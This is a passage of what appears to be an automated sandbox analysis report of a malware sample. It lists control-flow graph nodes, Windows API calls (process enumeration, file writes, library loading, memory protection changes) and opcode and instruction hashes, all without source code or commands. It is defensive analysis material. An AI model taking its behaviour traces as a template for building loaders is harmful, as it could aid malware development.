70af42 GlobalAlloc 1858->1859 1862 709ecd 1858->1862 1860 709fb8 1859->1860 1861 70af42 GlobalAlloc 1860->1861 1861->1862 1862->1841 1864 70aea3 WriteFile 1863->1864 1865 70ae9f 1863->1865 1864->1865 1865->1848 1866 70c4d2 1865->1866 1867 70c4e3 1866->1867 1868 70c576 malloc 1867->1868 1869 70c522 1867->1869 1868->1869 1869->1848 1893 70a3d2 1898 709c22 1893->1898 1895 70a3ea 1896 70a882 4 API calls 1895->1896 1897 70a412 1896->1897 1899 70af42 GlobalAlloc 1898->1899 1900 709c30 1899->1900 1900->1895 1870 70c058 1872 70bfa8 1870->1872 1871 70c052 1874 70c0e3 1871->1874 1875 709912 GlobalAlloc 1871->1875 1872->1871 1873 709c62 GlobalAlloc 1872->1873 1879 70b482 4 API calls 1872->1879 1873->1872 1876 709b12 GlobalAlloc 1874->1876 1877 70c0ed 1874->1877 1878 70c13c 1874->1878 1875->1874 1876->1878 1878->1877 1880 70af42 GlobalAlloc 1878->1880 1879->1872 1881 70c1e9 1880->1881 1882 70a4b2 2 API calls 1881->1882 1883 70c220 1882->1883 1884 70af42 GlobalAlloc 1883->1884 1885 70c25d 1884->1885 1886 70c27a VirtualProtect 1885->1886 1887 70a832 1886->1887 1888 70c2b7 VirtualProtect 1887->1888 1888->1877

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 217 70afa2-70afb0 218 70afb7-70afbe 217->218 219 70afc4-70afdb call 70af42 218->219 220 70b109-70b10d 218->220 223 70afe2-70b00f call 70a9b2 NtQuerySystemInformation 219->223 224 70afdd 219->224 227 70b011-70b019 223->227 228 70b01b-70b038 call 70af42 223->228 224->220 227->218 231 70b03b-70b041 228->231 232 70b102 231->232 233 70b047-70b04e 231->233 232->220 234 70b0f2-70b0fd 233->234 235 70b054-70b074 call 70a9b2 233->235 234->231 238 70b07f-70b085 235->238 239 70b087-70b093 238->239 240 70b0ab-70b0d7 call 70ad72 call 70a5f2 238->240 239->240 242 70b095-70b0a9 239->242 247 70b0e1-70b0ea 240->247 248 70b0d9-70b0df 240->248 242->238 247->234 249 70b0ec-70b0ef 247->249 248->234 249->234
                                                    APIs
                                                      • Part of subcall function 0070AF42: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0070AF72
                                                    • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 0070B006
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd
                                                    Similarity
                                                    • API ID: AllocGlobalInformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3737350999-0
                                                    • Opcode ID: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                    • Instruction ID: b06ed3a5090679260f6cea361f5e47121adf9c2401c45fd81e42d1fa462b38ff
                                                    • Opcode Fuzzy Hash: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                    • Instruction Fuzzy Hash: 7C51DD75E10209EFCB04DF98C890AEEB7F5BF58300F208659E915A7381D779AE41CBA1

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 0070A8A4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                    • Instruction ID: af934c206a0094e205b3ae63a816cde90bead77c35c851e781f660c9745c9f71
                                                    • Opcode Fuzzy Hash: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                    • Instruction Fuzzy Hash: D731CE75A00208FFCB04DF98C881F9EB7B9EF48310F20C298E919AB391D675AE41DB50

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 13 70b6c2-70bbe2 call 70b112 call 70a672 * 2 call 70a532 * 18 call 70af42 call 70a192 call 70a4b2 call 70a532 * 8 call 70af42 call 70a122 call 70a4b2 call 70a532 * 3 call 70afa2 93 70bc12-70bd58 call 70a532 * 3 call 70a212 call 70a882 call 70a532 call 70b1a2 13->93 94 70bbe4-70bbeb 13->94 115 70bd60-70bd6b 93->115 116 70bd5a-70bd5e 93->116 95 70bbf6-70bbfa 94->95 95->93 96 70bbfc-70bc10 call 70ad02 95->96 96->95 117 70bd71-70bdcf 115->117 118 70bd6d 115->118 116->117 119 70bdd1-70be18 call 70b352 117->119 120 70be25-70be2b 117->120 118->117 124 70be1d-70be20 119->124 122 70be5d-70be98 call 70af42 call 70a832 120->122 123 70be2d-70be58 call 70a322 120->123 138 70bea2-70bea8 122->138 127 70c0f2-70c106 123->127 124->127 130 70c108-70c144 call 709b12 127->130 131 70c14d-70c159 127->131 140 70c146 130->140 141 70c14b 130->141 135 70c15c-70c17f call 70a7d2 131->135 144 70c190-70c30c call 70a422 call 70af42 call 70aa32 call 70ae22 call 70a4b2 call 70b692 call 70af42 call 70a832 VirtualProtect call 70a832 VirtualProtect 135->144 145 70c181-70c18a 135->145 142 70bed7-70beee call 70af42 138->142 143 70beaa-70bed5 138->143 146 70c316-70c319 140->146 141->135 150 70bef5-70bf00 142->150 143->138 199 70c313 144->199 145->144 152 70bf21-70bf84 call 70a262 call 70a5f2 call 70a022 150->152 153 70bf02-70bf1f 150->153 167 70c0c2-70c0c8 152->167 168 70bf8a-70bf9e call 70af42 152->168 153->150 167->127 170 70c0ca-70c0eb call 709912 167->170 178 70bfa8-70bfaf 168->178 170->127 182 70c0ed 170->182 179 70bfb5-70bfdc call 70a042 178->179 180 70c09c-70c0bf call 70a032 178->180 189 70bffe-70c023 call 709c62 179->189 190 70bfde-70bffc call 70ad02 179->190 180->167 182->146 197 70c025 189->197 198 70c027-70c032 189->198 190->178 197->178 200 70c034-70c050 call 70a4f2 198->200 201 70c097 198->201 199->146 204 70c052-70c056 200->204 205 70c05a-70c093 call 70b482 200->205 201->178 204->180 205->201 208 70c095 205->208 208->180 208->201
                                                    APIs
                                                      • Part of subcall function 0070AF42: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0070AF72
                                                      • Part of subcall function 0070A4B2: LoadLibraryW.KERNELBASE(?), ref: 0070A4E3
                                                    • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 0070C297
                                                    • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 0070C2CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual$AllocGlobalLibraryLoad
                                                    • String ID:
                                                    • API String ID: 2510009449-0
                                                    • Opcode ID: 12cd21608a8ffc2380a32fe6fd1c4dfdad82edcd5fa0718e4e7579e87a8b5082
                                                    • Instruction ID: 6828f4dbac52e5fb711e07ce1440fd4f641dc0d0878df5b1a527fe1b09698ab8
                                                    • Opcode Fuzzy Hash: 12cd21608a8ffc2380a32fe6fd1c4dfdad82edcd5fa0718e4e7579e87a8b5082
                                                    • Instruction Fuzzy Hash: F792B4B6E00218EFCB14DF98D991EEEB7B5BF98300F148298E509A7341E635AE45CF51

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 209 70ae72-70ae9d CreateFileW 210 70aea3-70aec6 WriteFile 209->210 211 70ae9f-70aea1 209->211 213 70aed8-70aee4 210->213 214 70aec8-70aed6 210->214 212 70aee6-70aee9 211->212 213->212 214->212
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0070AE94
                                                    • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 0070AEC2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd
                                                    Similarity
                                                    • API ID: File$CreateWrite
                                                    • String ID:
                                                    • API String ID: 2263783195-0
                                                    • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                    • Instruction ID: 4879f55ace3d0c8a4e9e9892da35f6326331e8f4f0a8dbecfc8cd06c44723555
                                                    • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                    • Instruction Fuzzy Hash: A8010075640208FBDB10DE58CD42F9EB3B9AF98314F20C254FA189B2D1D631EE02DB91

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 250 70a4b2-70a4ee call 70af42 call 70aa82 LoadLibraryW
                                                    APIs
                                                      • Part of subcall function 0070AF42: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0070AF72
                                                    • LoadLibraryW.KERNELBASE(?), ref: 0070A4E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd
                                                    Similarity
                                                    • API ID: AllocGlobalLibraryLoad
                                                    • String ID:
                                                    • API String ID: 3361179946-0
                                                    • Opcode ID: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                    • Instruction ID: d3596bb7cc851b4e0f92be84d4f48b8e268f2cea070f1e8caf4b81b370f54b71
                                                    • Opcode Fuzzy Hash: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                    • Instruction Fuzzy Hash: 84E0C9B5A00208FBCB40EFA8D982A9D7BB8AB58201F108194F90897340E635EE158B91

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 255 70c4d2-70c520 call 70a9b2 260 70c522-70c524 255->260 261 70c529-70c561 255->261 262 70c705-70c708 260->262 265 70c563-70c571 261->265 266 70c576-70c5a2 malloc 261->266 265->262 267 70c5ad-70c5b3 266->267 269 70c633-70c637 267->269 270 70c5b5-70c5bc 267->270 271 70c639-70c656 269->271 272 70c65b-70c672 call 70b5a2 269->272 273 70c5c7-70c5cd 270->273 271->262 280 70c693-70c6bf 272->280 281 70c674-70c691 272->281 275 70c62e 273->275 276 70c5cf-70c5e9 273->276 275->267 282 70c5ee-70c62c call 70c342 276->282 284 70c6ca-70c6d2 280->284 281->262 282->273 287 70c6d4-70c6f5 284->287 288 70c6f7-70c6fe 284->288 287->284 293 70c703 288->293 293->262
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                    • Instruction ID: ba886b3d7e4bef73f4b9b9eb82985ecaf6b5c0ffac5f7dc9389e1c1d4969f07f
                                                    • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                    • Instruction Fuzzy Hash: 4191DA75D04209EFCB08CF98D891AEEBBF5BF88300F148659E515AB391D735AA45CFA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 317 70af42-70af50 318 70af52-70af5b 317->318 319 70af5e-70af77 GlobalAlloc 317->319 318->319
                                                    APIs
                                                    • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0070AF72
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd
                                                    Similarity
                                                    • API ID: AllocGlobal
                                                    • String ID:
                                                    • API String ID: 3761449716-0
                                                    • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                    • Instruction ID: 6806ea7d0f31b98e40dca8a202ead23bba02e7b3cd24b420eef3d9bab78bb807
                                                    • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                    • Instruction Fuzzy Hash: F8F02278614209EFCB44DF58D580959B7A5EB48360F10C299BD198B345D631EE81DB94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                    • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                    • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                    • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595